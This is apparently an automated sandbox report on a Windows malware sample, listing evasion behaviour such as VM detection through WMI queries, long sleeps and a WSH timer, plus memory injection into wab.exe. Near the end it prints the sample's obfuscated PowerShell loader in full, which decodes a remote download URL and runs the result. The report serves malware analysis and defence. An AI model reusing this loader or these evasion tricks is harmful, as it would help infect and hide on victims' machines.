Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 23910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 237D0000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199889	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199781	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199672	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199563	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199438	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199313	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199188	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199075	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1198969	Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4932	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4951	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7513	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2245	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 5559	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 4264	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6484	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2804	Thread sleep count: 7513 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5712	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4372	Thread sleep count: 2245 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5312	Thread sleep count: 5559 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -199532s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -99547s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -99438s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5312	Thread sleep count: 4264 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -99327s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -99203s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -99087s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98969s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98831s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98704s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98579s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98454s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98329s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98204s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98079s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -97967s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -97854s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -97735s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -97610s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -99888s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -99641s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -99525s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -99407s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -99297s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -99188s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -99078s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98964s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98856s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98750s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98641s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98530s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98421s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98313s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98172s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -98063s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -97953s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -1200000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -1199889s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -1199781s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -1199672s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -1199563s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -1199438s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -1199313s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -1199188s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -1199075s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320	Thread sleep time: -1198969s >= -30000s	Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99766	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99547	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99438	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99327	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99203	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99087	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98969	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98831	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98704	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98579	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98454	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98329	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98204	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98079	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97967	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97854	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97735	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97610	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99888	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99641	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99525	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99407	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99297	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99188	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99078	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98964	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98856	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98750	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98641	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98530	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98421	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98313	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98172	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98063	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97953	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199889	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199781	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199672	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199563	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199438	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199313	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199188	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1199075	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1198969	Jump to behavior

Source: wab.exe, 00000008.00000002.3277379903.0000000000508000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx1V%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000002.00000002.2710598432.000001D6DBDDC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllem
Source: powershell.exe, 00000005.00000002.2418986473.0000000007680000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
Source: wab.exe, 00000008.00000002.3277379903.000000000055C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_090E0000 LdrInitializeThunk,

5_2_090E0000

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3AA0000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: EF960			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Myxogaster.Opv && echo $"	Jump to behavior
